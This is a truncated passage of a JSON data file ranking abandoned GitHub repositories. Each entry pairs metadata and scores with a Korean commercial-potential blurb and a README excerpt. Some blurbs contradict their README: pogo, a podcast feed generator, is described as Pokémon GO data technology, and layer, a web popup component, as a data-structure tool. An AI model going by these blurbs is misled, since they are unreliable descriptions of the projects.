\"https://github.com/wenbochang888/house/raw/final/house2.pdf\">点我下载PDF文档(子房大神)</a>**\n- ### **<a href = \"https://github.com/wenbochang888/house/raw/final/house3.pdf\">点我下载PDF文档(大鹏金翅明王)</a> 2021.11.6更新**\n- #### **<a href = \"https://bobo-person.feishu.cn/docx/GkZtdgO2io5S9WxWeOpcJtcCnaf\">下载失败、网络出错，请点击这里。备用下载地址</a>**\n- #### **<a href = \"https://github.com/wenbochang888/house/issues\">其他问题，欢迎issues留言</a>**\n- #### **<a href = \"https://www.zhihu.com/question/284939230/answer/483437087\">知乎回答被删了, 谁提供下快照，可以issue里面提供下，谢谢</a>**\n\n\n### 微信小程序在线阅读：程序员博博\n![qr](https://github.com/wenbochang888/house/assets/26178822/b2f14d91-1320-447c-999c-b78a7a18ad24)\n\n \n### **前言：**\n\n- 本人对经济一些比较感兴趣，也比较经常关注新闻，逛逛论坛什么的。\n\n- 刚看到知乎一个问题 <a href = \"https://www.zhihu.com/question/284939230/answer/449853894\"> **房价真的会就这样一直涨下去吗？**</a>  感慨甚多\n- 里面提到了一篇2010年天涯社区的一篇帖子  <a href =","composite_score":0.382,"license_safety_tag":"safe"},{"name":"gadenbuie/ggweekly","github_url":"https://github.com/gadenbuie/ggweekly","stars":5,"language":"R","license":"NOASSERTION","abandonment_months":55,"description":"# ggweekly 저장소 분석\n\n## 왜 보물인가\n매주 데이터 시각화 팁과 그래프 그리기 기술을 배울 수 있는 실용적인 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 교육 플랫폼**: 비즈니스 직원들을 위한 주간 데이터 해석 강좌 제공\n2. **내부 보고서 작성 도구**: 기업의 경영진 회의용 시각화 템플릿 및 가이드 배포\n3. ","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# ggweekly\n\n<!-- badges: start -->\n\n<!-- badges: end -->\n\nThe goal of ggweekly is to easily create custom weekly planners with\n[ggplot2](https://ggplot2.tidyverse.org).\n\n## Installation\n\nYou can install **ggweekly** from GitHub with `devtools`\n\n``` r\ndevtools::install_github(\"gadenbuie/ggweekly\")\n```\n\n## Example\n\nThis is a basic example which shows you how to create a weekly planner\ncovering April, May, and June of 2019.\n\n``` r\nlibrary(ggweekly)\nggweek_planner(\n  start_day = \"2019-04-01\", \n  end_day = \"2019-06-30\", \n)\n```\n\n<img src=\"man/figures/README-year-week-1.png\" width=\"100%\" />\n\nYou can also create traditional calendars as well.\n\n``` r\nggweek_planner(\n  start_day = \"2019-04-01\", \n  end_day = \"2019-06-30\", \n  show_month_boundaries = FALSE, \n  show_month_start_day = FALSE,\n  week_start = \"isoweek\",\n  week_start_label = \"week\"\n) + \n  ggplot2::ggtitle(\"2019\") +\n  ggplot2::facet_wrap(~ month, scales = 'free')\n```","composite_score":0.382,"license_safety_tag":"unknown"},{"name":"ksoichiro/Android-ObservableScrollView","github_url":"https://github.com/ksoichiro/Android-ObservableScrollView","stars":9,"language":"Java","license":"apache-2.0","abandonment_months":61,"description":"# Android-ObservableScrollView 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면을 위아래로 스크롤할 때 상단 메뉴가 자동으로 나타났다 숨었다 하는 '똑똑한 스크롤 효과'를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜미디어 앱 개발 회사**: 뉴스피드를 스크롤할 때 상단의 검색바가 자동으로 접혔다 펼쳐지는 기","readme_excerpt":"# Android-ObservableScrollView\n\n[![Build Status](http://img.shields.io/travis/ksoichiro/Android-ObservableScrollView.svg?style=flat)](https://travis-ci.org/ksoichiro/Android-ObservableScrollView)\n[![Coverage Status](https://img.shields.io/coveralls/ksoichiro/Android-ObservableScrollView/master.svg?style=flat)](https://coveralls.io/r/ksoichiro/Android-ObservableScrollView?branch=master)\n[![Maven Central](http://img.shields.io/maven-central/v/com.github.ksoichiro/android-observablescrollview.svg?style=flat)](https://github.com/ksoichiro/Android-ObservableScrollView/releases/latest)\n[![API](https://img.shields.io/badge/API-9%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=9)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Android--ObservableScrollView-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1136)\n\nAndroid library to observe scroll events on scrollable views.  \nIt's easy to interact with the Toolbar introduced in Android 5","composite_score":0.3819,"license_safety_tag":"safe"},{"name":"sentsin/layer","github_url":"https://github.com/sentsin/layer","stars":11,"language":"JavaScript","license":"mit","abandonment_months":22,"description":"# sentsin/layer 분석\n\n## 왜 보물인가\n복잡한 데이터 구조를 단순하게 정리해주는 도구로, 소프트웨어 개발자들이 더 빠르고 쉽게 작업할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 관리 플랫폼을 만드는 회사에서 핵심 기능으로 통합하여 제품 경쟁력 강화\n2. **내부 업무 도구**: 개발팀이 자사 시스템의 ","readme_excerpt":"## 📣 提示\n\n**layer 组件已完全集成到 Layui 中，不再做单独维护。建议直接使用 layui 中 layer。**\n\n> layer 文档：https://layui.dev/docs/layer/\n\n\n## 概要\nlayer 是一款历来都备受青睐的 Web 弹出层组件，具备全方位的解决方案，面向的是各个水平段的开发人员，您的页面会轻松地拥有丰富友好的操作体验。在与同类组件的比较中，layer 会更能被开发者所选择。这不仅是凭「脸」取胜，而是它尽可能地在以更少的代码展现更强健的功能，且格外注重性能的提升、易用和实用性，layer 甚至还兼容了包括 IE6 在内的所有主流浏览器。其数量可观的基础属性和方法，使得您可以自定义太多您需要的风格，每一种弹层模式各具特色，广受欢迎。当然，这种「王婆卖瓜」的陈述听起来总是有点难受，因此你需要进一步了解她是否真的如你所愿。\n\n[文档与演示](http://layui.dev/docs/2/layer/) \n\n## 愿景\n成为网页弹出层的首先交互方案\n\n## 影响\n因着数年的坚持维护，layer 已被运用在不计其数 Web 平台，几乎所处可见，其中还不乏众多知名大型网站。layer 已被国内乃至全世界至少数十万的开发者所使用过。\n\n","composite_score":0.3818,"license_safety_tag":"safe"},{"name":"halfnelson/svelte-native","github_url":"https://github.com/halfnelson/svelte-native","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":15,"description":"","readme_excerpt":"# \\*\\* NOTICE \\*\\* This has moved\n\nThis project is now managed/developed by the [nativescript community](https://github.com/nativescript-community/svelte-native) and this fork has been archived.\n\nIts new home on npm is `@nativescript-community/svelte-native`  and on the web at https://svelte.nativescript.org/\n\n\n","composite_score":0.3818,"license_safety_tag":"safe"},{"name":"gmemstr/pogo","github_url":"https://github.com/gmemstr/pogo","stars":12,"language":"Go","license":"gpl-3.0","abandonment_months":51,"description":"# gmemstr/pogo 프로젝트 분석\n\n## 왜 보물인가\n포켓몬GO 관련 실시간 데이터를 처리하는 기술로, 게임 데이터 활용이나 위치 기반 서비스에 필요한 핵심 기술을 보유하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **포켓몬GO 커뮤니티 앱**: 플레이어들이 실시간으로 포켓몬 위치 정보를 공유하는 모바일 서비스로 운영 가능합니다.\n\n2. **게임","readme_excerpt":"<img src=\"https://cdn.rawgit.com/gmemstr/pogo/ddc9ff3a/assets/web/static/logo-sm.png\" alt=\"Pogo logo\" align=\"right\">\n\n## Pogo\n\n[![Build Status](https://travis-ci.org/gmemstr/pogo.svg?branch=master)](https://travis-ci.org/gmemstr/pogo) [![Demo](https://img.shields.io/badge/demo-demo.pogoapp.net-green.svg)](http://demo.pogoapp.net)\n\nPodcast RSS & JSON feed generator and CMS in Go.\n\n## Getting Started\n\nThere are a couple options for getting Pogo up and running.\n\n- [Download the latest release](#running)\n- [Use Docker](#docker)\n- [Clone the repo and build](#building)\n\n## Features \n\n- Automatic RSS and JSON feed generation\n- Frontend for listening and publishing episodes\n- Multiple user support\n- Simple deployment\n- SPA frontend\n- Docker support\n\n## Running\n\n[![asciicast](https://asciinema.org/a/GTsDD2nJeLktUAbrQq4hyziOt.png)](https://asciinema.org/a/GTsDD2nJeLktUAbrQq4hyziOt)\n\n1. [Download the latest release](https://github.com/gmemstr/pogo/releases/latest)\n2. Run `pogo`\n\n## Docker\n\n [![do","composite_score":0.3818,"license_safety_tag":"restricted"},{"name":"oldshiji/siwo","github_url":"https://github.com/oldshiji/siwo","stars":5,"language":"PHP","license":"unknown","abandonment_months":82,"description":"# oldshiji/siwo 분석 보고서\n\n## 왜 보물인가\n실시간 정보를 필요로 하는 서비스에 필요한 핵심 기술이지만, 2019년 이후 업데이트가 중단되어 현재 실무 적용 가능성이 제한적입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 뉴스·정보 수집 서비스**: 웹사이트의 최신 정보를 자동으로 수집하고 고객에게 제공하는 SaaS 플랫폼\n2. **기업 ","readme_excerpt":"Siwo\r\n======\r\n基于swoole4.2.x版本封装的简易框架\r\n\r\n框架实现了\r\n----\r\n1. http控制器,tcp控制器,udp控制器,websocket控制器,socket控制器的封装，只需要定义好路由编写对应的控制器即可使用\r\n2. 简易封装了mysql协程客户端，简单实现了类似tp的DB用法\r\n\r\n框架安装\r\n----\r\n1.composer create-project oldshiji/siwo siwo\r\n目前沿无稳定版本，安装时请指定版本即可\r\n\r\n框架和单片机通信实验\r\n----\r\n![logo](https://github.com/oldshiji/siwo/blob/master/tmp/mcu.png)\r\n框架启动\r\n----\r\n\r\n1. 启动\r\nphp siwod start\r\n![logo](https://github.com/oldshiji/siwo/blob/master/tmp/siwo.png)\r\n2. 停止\r\nphp siwod stop\r\n3. 重启\r\nphp siwod restart\r\n\r\n### HTTP Controller\r\n```php\r\n\r\n/**\r\n * Created by PhpStorm.\r\n * User: 1655664358@qq.com\r\n * Date: 2018/11/19\r\n * Time: 13:36\r\n */\r\nRoute::group(['prefix'=>'api','middleware'=>'web'],function(){\r\n    Route::get(\"user/test\",\"UserController@test\");\r\n    Route::get(\"user/lists\",\"UserController@testa\");\r\n    Route::post(\"video/clip\",\"VideoController@clip\");\r\n    Route::post(\"video/division\",\"VideoController@clipFilter\");\r\n\r\n\r\n    Route::get(\"chan/test\",\"ChanController@test\");\r\n\r\n\r\n\r\n});\r\n\r\nRoute::group(['middlewar","composite_score":0.3817,"license_safety_tag":"unknown"},{"name":"caicloud/tensorflow-tutorial","github_url":"https://github.com/caicloud/tensorflow-tutorial","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":83,"description":"# TensorFlow 튜토리얼 저장소 분석\n\n## 왜 보물인가\n인공지능을 배우려는 사람들을 위한 실전 학습 자료로, 복잡한 기술을 단계별로 배울 수 있는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 기초부터 고급까지 단계별 인공지능 강좌를 제공하는 유료 구독 서비스\n- **기업 직원 교육 도구**: 대기업 데이터팀의 인공","readme_excerpt":"# tensorflow-tutorial\nExample TensorFlow codes and Caicloud TensorFlow as a Service dev environment.\n","composite_score":0.3815,"license_safety_tag":"unknown"},{"name":"mobz/elasticsearch-head","github_url":"https://github.com/mobz/elasticsearch-head","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":59,"description":"# elasticsearch-head 기술 가치 분석\n\n## 왜 보물인가\n복잡한 데이터베이스를 마우스로 클릭하며 쉽게 관리할 수 있는 시각화 도구로, 기술자가 아닌 사람도 데이터 상태를 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼이 고객사의 데이터베이스 건강 상태를 자동으로 모니터링하고 보고하는 ","readme_excerpt":"h1. elasticsearch-head\n\nh2. A web front end for an Elasticsearch cluster\n\nh3. \"http://mobz.github.io/elasticsearch-head\":http://mobz.github.io/elasticsearch-head\n\nh2. Running\n\nThere are multiple ways of running elasticsearch-head.\n\nh4. Running with built in server\n\n* @git clone git://github.com/mobz/elasticsearch-head.git@\n* @cd elasticsearch-head@\n* @npm install@\n* @npm run start@\n\n* @open@ \"http://localhost:9100/\":http://localhost:9100/\n\nThis will start a local webserver running on port 9100 serving elasticsearch-head\n\nh4. Running with docker\n\n* for Elasticsearch 5.x: @docker run -p 9100:9100 mobz/elasticsearch-head:5@\n* for Elasticsearch 2.x: @docker run -p 9100:9100 mobz/elasticsearch-head:2@\n* for Elasticsearch 1.x: @docker run -p 9100:9100 mobz/elasticsearch-head:1@\n* for fans of alpine there is @mobz/elasticsearch-head:5-alpine@\n  \n* @open@ \"http://localhost:9100/\":http://localhost:9100/\n\nh4. Running as a Chrome extension\n\n* Install \"ElasticSearch Head\":https://chrome.google.com","composite_score":0.3812,"license_safety_tag":"unknown"},{"name":"foru17/front-end-collect","github_url":"https://github.com/foru17/front-end-collect","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":87,"description":"# foru17/front-end-collect 보물 평가\n\n## 왜 보물인가\n웹사이트 만드는 데 필요한 유용한 도구들과 자료를 한 곳에 모아놓은 모음집으로, 개발자들의 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 도구와 자료를 추천하고 공유하는 구독형 서비스로 운영\n2. **기업 교육 도구**: 신입","readme_excerpt":"前端收集\n=================\n\n在前端路上摸索前行，在这里分享自己长期关注的前端开发相关的优秀网站、博客、以及活跃开发者。欢迎更新，以下各排名不分先后顺序。\n\n自己 RSS 长期订阅了一些IT 和技术相关博客，这里是我Feedly 输出的opml，可直接导入一些RSS 阅读器:\n[https://github.com/foru17/luolei-dotfiles/blob/master/feedly.opml](https://github.com/foru17/luolei-dotfiles/blob/master/feedly.opml)\n\n#### [前端收集图谱](http://get-set.cn/front-end-collect/)\n\n此部分为[@jikeytang ](https://github.com/jikeytang)贡献\n\n- clone https://github.com/foru17/front-end-collect\n- cd front-end-collect\n- bower install\n- 放入你喜欢的web容器,访问index.html即可\n- 你也直接可以访问: [https://front-end-collect.is26.com](https://front-end-collect.is26.com)\n- 支持Chrome, Firefox and IE10&11以上浏览器\n\n#### 聚合&&周报订阅\n\n|名称 |订阅地址 | 介绍 |\n| ----- | ----- | ------ |\n|**英文推送**|||\n|Html5 Weekly|http://html5weekly.com/| Html 技术类|\n|CSS Weekly|http://css-weekly.com/| |\n|Javascript Weekly|http://javascriptweekly.com/|JS相关，同样有 html,css 和工具相关|\n|Web Design Weekly| http://web-design-weekly.com/ | 设计、技术、技巧、工具聚合|\n|UX Weekly|http://uxwkly.com/|用户体验、网页设计推送|\n|Web Tools Weekly|http://we","composite_score":0.381,"license_safety_tag":"unknown"},{"name":"czy36mengfei/tensorflow2_tutorials_chinese","github_url":"https://github.com/czy36mengfei/tensorflow2_tutorials_chinese","stars":9,"language":"Jupyter Notebook","license":"unknown","abandonment_months":66,"description":"","readme_excerpt":"# tensorflow2_tutorials_chinese\n\ntensorflow2中文教程，持续更新（不定期更新）\n\n\n\ntensorflow 2.0 正式版已上线， 后面将持续根据TensorFlow2的相关教程和学习资料。\n\n最新tensorflow教程和相关资源，请关注微信公众号：DoitNLP，\n后面我会在DoitNLP上，持续更新深度学习、NLP、Tensorflow的相关教程和前沿资讯，它将成为我们一起学习tensorflow的大本营。\n\n\n当前tensorflow版本：tensorflow2.0\n\n\n\n\n**最全Tensorflow 2.0 教程持续更新：**\nhttps://zhuanlan.zhihu.com/p/59507137\n\n\n本教程主要由tensorflow2.0官方教程的个人学习复现笔记整理而来，并借鉴了一些keras构造神经网络的方法，中文讲解，方便喜欢阅读中文教程的朋友，tensorflow官方教程：https://www.tensorflow.org\n\n\n[TensorFlow 2.0 教程- Keras 快速入门](https://zhuanlan.zhihu.com/p/58825020)\n\n[TensorFlow 2.0 教程-keras 函数api](https://zhuanlan.zhihu.com/p/58825710)\n\n[TensorFlow 2.0 教程-使用keras训练模型](https://zhuanlan.zhihu.com/p/58826227)\n\n[TensorFlow 2.0 教程-用keras构建自己的网络层](https://zhuanlan.zhihu.com/p/59481536)\n\n[TensorFlow 2.0 教程-keras模型保存和序列化](https://zhuanlan.zhihu.com/p/59481985)\n\n[TensorFlow 2.0 教程-eager模式](https://zhuanlan.zhihu.com/p/59482373)\n\n[TensorFlow 2.0 教程-Variables](https://zhuanlan.zhihu.com/p/59482589)\n\n[TensorFlow 2.0 教程--AutoGraph](https://zhu","composite_score":0.3809,"license_safety_tag":"unknown"},{"name":"Freelander/Android_Data","github_url":"https://github.com/Freelander/Android_Data","stars":6,"language":"Java","license":"unknown","abandonment_months":29,"description":"# Freelander/Android_Data 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 데이터를 정리한 자료로, 앱 개발자들이 개발 시간을 단축할 수 있도록 돕는 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 교육 플랫폼**: 안드로이드 앱 개발 학원이나 온라인 강좌에서 학생용 학습 자료로 판매\n2. **개발자 도구 SaaS","readme_excerpt":"<p align=\"center\">\n  <b>Special thanks to the generous sponsorship by:</b>\n  <br><br>\n  <a href=\"https://www.yousails.com\">\n    <img src=\"https://yousails.com/banners/brand.png\" width=350>\n  </a>\n</p>\n\n# Android 学习资料收集                                                        \n\n 收集整理这份资料灵感来自于 [trip_to_iOS](https://github.com/Aufree/trip-to-iOS), 征得同意引用了该资料的开头描述\n\n 收集整理这份资料主要帮助初学者学习 Android 开发, 希望能快速帮助到他们快速入门, 找到适合自己学习资料,   节省再去收集学习资料时间.\n\n 这份资料我会不断的更新完善, 同时也欢迎更多具有丰富经验的Android开发者将自己常用的工具、学习资料、学习心得等分享上来, 我将定期筛选合并, 该份学习资料有不足的地方, 也请指出, 我会谦虚接受改正, 希望我能与大家一起来学习, 谢谢.\n\n **如果您有任何意见或建议也可以通过[邮件](mailto:huanggaojun13@gmail.com)或[微博](http://weibo.com/gaojunhuang)联系我**\n\n>感谢 [@GitHubDaily](http://weibo.com/GitHubDaily) 与 [@Android 开发日常](http://weibo.com/AndroidDevDaily) 的大力支持\n\n## 目录\n\n- [书籍](#书籍)\n- [开发环境/工具](#开发环境工具)\n- [博客](#博客)\n- [社区](#社区)\n- [开源项目学习](#开源项目学习)\n- [Android 开发者杂志周刊](#android-开发者杂志周刊)\n- [Awesome 系列](#awesome-系列)\n- [动画系列](#动画系列)\n- [Material Design 设计](#material-design-设计)\n- [素材](#素材)\n- [开源库收集](#","composite_score":0.3809,"license_safety_tag":"unknown"},{"name":"vortesnail/qier-player","github_url":"https://github.com/vortesnail/qier-player","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":15,"description":"# qier-player 보물 분석\n\n## 왜 보물인가\n웹에서 동영상을 재생하는 기능을 쉽게 만들 수 있는 도구로, 유튜브나 넷플릭스 같은 서비스들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 강의 동영상을 웹사이트에 직접 올리고 자동 재생, 일시정지 등의 기능을 제공\n2. **기업 내부 영상 관리 시스템**","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://github.com/vortesnail/qier-player\">\n    <img src=\"website/docs/public/logo.svg\" height=\"140\" width=\"140\" />\n  </a>\n  <h4>QierPlayer</h4>\n  <br />\n  <a href=\"https://www.npmjs.com/package/qier-player\">\n    <img src=\"https://img.shields.io/npm/v/qier-player?style=flat-square&logo=npm\" />\n  </a>\n  <a href=\"https://unpkg.com/qier-player@latest/dist/umd/index.min.js\">\n    <img\n      src=\"http://img.badgesize.io/https://unpkg.com/qier-player@latest/dist/umd/index.min.js?compression=gzip&style=flat-square\"\n      alt=\"Gzip Size\"\n    />\n  </a>\n  <a href=\"https://app.codacy.com/project/badge/Grade/042def878d8f49039cd4cde757fa1e5c\">\n    <img src=\"https://img.shields.io/codacy/grade/042def878d8f49039cd4cde757fa1e5c?logo=codacy&style=flat-square\" />\n  </a>\n</div>\n\n<div align=\"center\">\n  <a href=\"https://github.com/vortesnail/qier-player/blob/master/README-zh-Cn.md\">\n    简体中文\n  </a>\n  &#124; English\n</div>\n\n## Introduction\n\nQierPlayer is a simple and easy-to-u","composite_score":0.3805,"license_safety_tag":"safe"},{"name":"allenwong/30DaysofSwift","github_url":"https://github.com/allenwong/30DaysofSwift","stars":6,"language":"Swift","license":"unknown","abandonment_months":49,"description":"# 30DaysofSwift 상용화 분석\n\n## 왜 보물인가\niPhone 앱 개발을 처음 배우는 사람들을 위한 30일 단계별 학습 가이드로, 초보자 친화적인 프로그래밍 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 구독형 iOS 개발 강좌 플랫폼으로 월별 새로운 학습 과정 제공\n2. **기업 내부 도구**: IT 회사의 ","readme_excerpt":"# 30 Days of Swift\n\n![Alt text](https://raw.githubusercontent.com/allenwong/30DaysofSwift/master/github%20cover.png)\n\n[![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=https://github.com/allenwong/30DaysofSwift)\n[![Twitter Follow](https://img.shields.io/twitter/follow/creativewang.svg?style=social)](https://twitter.com/creativewang)\n\n## Hi Community ##\n\nI am Allen Wang, a [product designer](https://dribbble.com/openallen) and currently learning Swift.\n\nThis project was totally inspired by [Sam Lu](https://twitter.com/samvlu)'s [100 Days of Swift](http://samvlu.com/index.html) project, after read his [Medium post](https://medium.com/@samvlu/100-days-of-swift-736d45a19b63#.ayz5vx6mc) I made a decision to put my every single day to write Swift, this's the final code of 30 tiny Swift projects.\n\n## Thank You to My Sponsor ##\n30 Dasy of Swift is being sponsored by the following tool, please help to support me by taking","composite_score":0.3804,"license_safety_tag":"unknown"},{"name":"ethereum/web3.js","github_url":"https://github.com/ethereum/web3.js","stars":6,"language":"TypeScript","license":"NOASSERTION","abandonment_months":15,"description":"# ethereum/web3.js 평가 보고서\n\n## 왜 보물인가\n블록체인 기술을 사용하는 모든 사람들이 필요로 하는 필수 연결 도구로, 암호화폐와 블록체인 생태계가 성장할수록 수요가 증가합니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 개인 투자자들이 쉽게 암호화폐를 사고팔 수 있는 웹 플랫폼 제공\n2. **기업용 블록체인 관리 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"assets/logo/web3js.jpg\" width=\"300\" alt=\"web3.js\" />\n</p>\n\n# Web3.js\n\n### Web3.js libraries are being sunset on March 4th, 2025. For migration guides and more details please refer to [Chainsafe blog](https://blog.chainsafe.io/web3-js-sunset/)\n\n[![Dependency Status][downloads-image]][npm-url] ![Unit Test Coverage](https://img.shields.io/codecov/c/github/web3/web3.js/4.x?label=unit%20test%20coverage)\n![Commit Activity](https://img.shields.io/github/commit-activity/m/web3/web3.js/4.x?label=commit%20activity%20on%204.x)\n![Contributors](https://img.shields.io/github/contributors/web3/web3.js?label=contributors%20on%20all%20branches)\n\n![ES Version](https://img.shields.io/badge/ES-2020-yellow)\n![Node Version](https://img.shields.io/badge/node-14.x-green)\n\nWeb3.js is a TypeScript implementation of the [Ethereum JSON RPC API](https://eth.wiki/json-rpc/API) and related tooling maintained by [ChainSafe Systems](https://chainsafe.io).\n\n## Installation\n\nYou can instal","composite_score":0.3804,"license_safety_tag":"unknown"},{"name":"zo0r/react-native-push-notification","github_url":"https://github.com/zo0r/react-native-push-notification","stars":7,"language":"Java","license":"mit","abandonment_months":28,"description":"# React Native Push Notification 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자에게 알림 메시지를 보내는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **배송 추적 서비스**: 고객에게 \"택배가 도착했습니다\" 같은 실시간 알림을 자동으로 전송\n2. **소셜 앱**: 새 메시지나 좋아요 알림을 사용자 폰에","readme_excerpt":"# React Native Push Notifications\n\n[![npm version](https://badge.fury.io/js/react-native-push-notification.svg?update=9)](http://badge.fury.io/js/react-native-push-notification)\n[![npm downloads](https://img.shields.io/npm/dm/react-native-push-notification.svg?update=9)](http://badge.fury.io/js/react-native-push-notification)\n\nReact Native Local and Remote Notifications for iOS and Android\n\n## State of the repository\n\nThis repository is not actively maintained. The main reason is time. The second one is probably the complexity of notifications on both iOS and Android.\nSince this project probably need a huge refactor to fix some issue or to implement new features. I think you should probably consider these alternatives: [Notifee](https://notifee.app) free since september or [react-native-notifications](https://github.com/wix/react-native-notifications).\n\nIf you are interested in being a maintainer of this project, feel free to ask in issues.\n\n## 🎉 Version 7.x is live ! 🎉\n\nCheck out for ","composite_score":0.3804,"license_safety_tag":"safe"},{"name":"alvarosaburido/slidev-theme-penguin","github_url":"https://github.com/alvarosaburido/slidev-theme-penguin","stars":17,"language":"Vue","license":"unknown","abandonment_months":19,"description":"# Slidev Theme Penguin 분석 보고서\n\n## 왜 보물인가\n업무 보고나 학교 발표를 멋진 슬라이드로 만들어주는 디자인 템플릿으로, 따로 디자인 공부 없이도 전문가 수준의 발표 자료를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 발표 자료 제작 SaaS**\n- 기업 교육/연수용 발표 템플릿 구독 서비스로, 직원들이 멋진 자료를 빠르","readme_excerpt":"![repository-banner.png](https://res.cloudinary.com/alvarosaburido/image/upload/v1612193118/as-portfolio/Repo_Banner_kexozw.png)\n\n# slidev-theme-penguin\n\n[![NPM version](https://img.shields.io/npm/v/slidev-theme-penguin?color=3AB9D4&label=)](https://www.npmjs.com/package/slidev-theme-penguin)\n\nA Penguin 🐧  theme for [Slidev](https://github.com/slidevjs/slidev).\n\nThis theme is based on my personal brand, but it can be easily use and customized for your own.\n\n<!--\nrun `npm run dev` to check out the slides for more details of how to start writing a theme\n-->\n\n<!--\nput some screenshots here to demonstrate your theme,\n-->\n\nLive demo: [here](https://slidev-theme-penguin.alvarosaburido.dev/)\n\n## You can help me keep working on this project 💚\n\n- [Become a Sponsor on GitHub](https://github.com/sponsors/alvarosaburido)\n- [One-time donation via PayPal](https://paypal.me/alvarosaburido)\n\n<h4 align=\"center\">Generous Unicorns 🦄</h4>\n\n<p align=\"center\">\n  <a href=\"https://github.com/OmgImAlexis\" targ","composite_score":0.3801,"license_safety_tag":"unknown"},{"name":"susanli2016/NLP-with-Python","github_url":"https://github.com/susanli2016/NLP-with-Python","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":26,"description":"# NLP-with-Python 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 인간의 언어를 이해하고 분석할 수 있도록 하는 기술 자료 모음으로, 챗봇, 검색 엔진, 감정 분석 등 현대 AI 서비스의 핵심 기술을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 리뷰 자동 분석 SaaS**: 온라인 쇼핑몰의 수천 개 상품 리뷰를 자동으로 긍정/부정으로","readme_excerpt":"# NLP with Python\nScikit-Learn, NLTK, Spacy, Gensim, Textblob and more\n","composite_score":0.3799,"license_safety_tag":"unknown"},{"name":"forkingdog/UITableView-FDTemplateLayoutCell","github_url":"https://github.com/forkingdog/UITableView-FDTemplateLayoutCell","stars":8,"language":"Objective-C","license":"mit","abandonment_months":51,"description":"# UITableView-FDTemplateLayoutCell 분석\n\n## 왜 보물인가\n스마트폰 앱에서 목록을 표시할 때 각 항목의 높이를 자동으로 계산해주는 개발자 도구로, 복잡한 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 메시지 앱, 피드 기반 서비스 등 목록 표시가 중요한 앱의 개발 가속화\n- **내부 업무 ","readme_excerpt":"# UITableView-FDTemplateLayoutCell\n<img src=\"https://cloud.githubusercontent.com/assets/219689/7244961/4209de32-e816-11e4-87bc-b161c442d348.png\" width=\"640\">\n\n## Overview\nTemplate auto layout cell for **automatically** UITableViewCell height calculating.\n\n![Demo Overview](https://github.com/forkingdog/UITableView-FDTemplateLayoutCell/blob/master/Sceenshots/screenshot2.gif)\n\n## Basic usage\n\nIf you have a **self-satisfied** cell, then all you have to do is: \n\n``` objc\n#import \"UITableView+FDTemplateLayoutCell.h\"\n\n- (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath\n{\n    return [tableView fd_heightForCellWithIdentifier:@\"reuse identifer\" configuration:^(id cell) {\n        // Configure this cell with data, same as what you've done in \"-tableView:cellForRowAtIndexPath:\"\n        // Like:\n        //    cell.entity = self.feedEntities[indexPath.row];\n    }];\n}\n```\n\n## Height Caching API\n\nSince iOS8, `-tableView:heightForRowAtIndexPath:` will be called","composite_score":0.3798,"license_safety_tag":"safe"},{"name":"jashkenas/coffeescript","github_url":"https://github.com/jashkenas/coffeescript","stars":6,"language":"CoffeeScript","license":"mit","abandonment_months":26,"description":"# CoffeeScript 저장소 분석\n\n## 왜 보물인가\nJavaScript를 더 간단하고 읽기 쉽게 쓸 수 있도록 만든 프로그래밍 언어로, 웹 개발자들의 생산성을 크게 향상시킬 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: CoffeeScript 학습 과정을 제공하는 온라인 코딩 부트캠프 SaaS\n2. **기업 개발","readme_excerpt":"```\n      @@@@@@@                @@@@  @@@@@\n     @@@@@@@@@@              @@@   @@@                                           {\n    @@@@     @@              @@@   @@@                                        }   }   {\n   @@@@          @@@@@@@    @@@   @@@     @@@@@@    @@@@@@                   {   {  }  }\n  @@@@          @@@   @@  @@@@@  @@@@@@  @@@   @@  @@@@  @@                   }   }{  {\n  @@@@         @@@@   @@   @@@    @@@   @@@   @@@ @@@   @@@                  {  }{  }  }\n  @@@@        @@@@    @@   @@@    @@@   @@@@@@@@  @@@@@@@@                  { }{ }{  { }\n  @@@@@       @@@@   @@    @@@    @@@   @@@       @@@                     {  { } { } { }  }\n   @@@@@@@@@@ @@@@@@@@    @@@    @@@    @@@@@@@@  @@@@@@@@                 { }   { }   { }\n      @@@@@               @@@    @@@      @@@@@     